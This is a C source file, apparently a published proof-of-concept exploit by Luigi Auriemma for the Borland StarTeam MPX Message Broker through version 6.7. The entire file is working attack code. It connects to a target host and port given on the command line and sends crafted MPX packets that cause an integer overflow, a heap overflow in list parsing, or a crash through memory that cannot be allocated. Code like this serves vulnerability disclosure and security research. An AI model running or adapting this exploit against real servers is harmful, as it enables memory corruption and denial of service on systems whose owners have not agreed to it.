/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        5101
#define BUFFSZ      0xffff
#define HEAD        "\x00\x00\x00\x4b\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x02"  // pre-built, simpler



int mpx_recv(int sd, u8 *data, int maxsz);
int tcp_recv(int sd, u8 *buff, int len);
int mpx_send(int sd, int id, u8 *data, int datalen);
int putcc(u8 *data, int chr, int len);
int putss(u8 *data, u8 *str, int maxsz);
int putmm(u8 *data, u8 *str, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            len,
            attack;
    u16     port    = PORT;
    u8      *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Borland StarTeam MPX <= 6.7 deserialization vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = integer overflow in the calculation of the remaining data\n"
            " 2 = heap overflow in the handling of the lists\n"
            " 3 = process termination caused by unallocable memory\n"
            "\n"
            "Note: this proof-of-concept is compatible only with the Message Broker service\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    send(sd, HEAD, sizeof(HEAD) - 1, 0);
    if(tcp_recv(sd, buff, 16) < 0) goto quit;

    p = buff;
    if(attack == 1) {
        p += putxx(p, 7,       32);         // number of structures
    } else if(attack == 2) {
        p += putxx(p, 0,        32);        // number of structures
    } else if(attack == 3) {
        p += putxx(p, 10,      32);         // number of structures
        attack = 1;
    }
    p += putxx(p, 0,            32);
    p += putxx(p, 0,            32);
    p += putxx(p, 0,            16);
    p += putxx(p, 0,            8);
    p += putxx(p, 0,            8);
    p += putxx(p, 0,            32);
    if(attack == 1) {
        p += putxx(p, 0,        32);        // total size of the lists
        for(i = 0; i < 5; i++) {            // number of elements (the structure below) specified at the beginning
            p += putxx(p, 0x01b52103, 32);  // type: string
            p += putxx(p, 8,          32);  // string size (NULL included)
            p += putss(p, "abcdef",   8);   // string (max 8)
        }

    } else {
        p += putxx(p, 2,            32);    // total size of the lists
        p += putxx(p, 0x4000 >> 3,  16);    // first list
        p += putcc(p, 'A', 0x4000);         // list's data
    }

    p += putss(p, "client_string", -1);     // rest of the data

    mpx_send(sd, -10, buff, p - buff);
    len = mpx_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;

quit:
    close(sd);
    free(buff);
    printf("- done\n");
    return(0);
}



int mpx_recv(int sd, u8 *data, int maxsz) {
    u32     len;
    u8      pck_hdr[16];

    if(tcp_recv(sd, pck_hdr, sizeof(pck_hdr)) < 0) return(-1);
    getxx(pck_hdr, &len, 32);
    len -= 16;
    if(len > maxsz) {
        printf("\nError: incoming packet is bigger than how much supported\n");
        exit(1);
    }
    if(tcp_recv(sd, data, len) < 0) return(-1);
    show_dump(data, len, stdout);
    return(len);
}



int tcp_recv(int sd, u8 *buff, int len) {
    int     t;
    u8      *p;

    for(p = buff; len; p += t, len -= t) {
        if(timeout(sd, 3) < 0) return(-1);
        t = recv(sd, p, len, 0);
        if(t <= 0) return(-1);
    }
    return(0);
}



int mpx_send(int sd, int id, u8 *data, int datalen) {
    u8      hdr[16];

    while(datalen & 7) data[datalen++] = 0;

    putxx(hdr,      16 + datalen, 32);
    putxx(hdr + 4,  0xdeadbeef,   32);
    putxx(hdr + 8,  0x004b,       16);
    putxx(hdr + 10, 0x0002,       16);  // 8 is used for quick packets, they don't have arrays and lists
    putxx(hdr + 12, id,           32);

    printf("- send packet type %d\n", id);

    if(send(sd, hdr,  16,      0) != 16)      return(-1);
    if(send(sd, data, datalen, 0) != datalen) return(-1);
    return(0);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int putss(u8 *data, u8 *str, int maxsz) {
    int     len;

    if(maxsz > 0) {
        len = maxsz;
        strncpy(data, str, maxsz);
    } else {
        len = strlen(str) + 1;
        memcpy(data, str, len);
    }
    return(len);
}



int putmm(u8 *data, u8 *str, int len) {
    memcpy(data, str, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


